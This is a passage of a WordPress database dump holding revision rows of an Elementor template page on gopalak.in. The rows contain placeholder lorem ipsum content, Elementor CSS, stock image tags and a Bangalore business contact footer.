.elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 15:11:58','2022-09-21 09:41:58','',1373,'https://gopalak.in/?p=1422',0,'revision','',0),(1423,1,'2022-09-21 15:11:58','2022-09-21 09:41:58','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 15:11:58','2022-09-21 09:41:58','',1373,'https://gopalak.in/?p=1423',0,'revision','',0),(1425,1,'2022-09-30 11:20:44','2022-09-30 05:50:44','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:20:44','2022-09-30 05:50:44','',1373,'https://gopalak.in/?p=1425',0,'revision','',0),(1426,1,'2022-09-30 11:20:45','2022-09-30 05:50:45','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:20:45','2022-09-30 05:50:45','',1373,'https://gopalak.in/?p=1426',0,'revision','',0),(1427,1,'2022-09-30 11:20:45','2022-09-30 05:50:45','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a 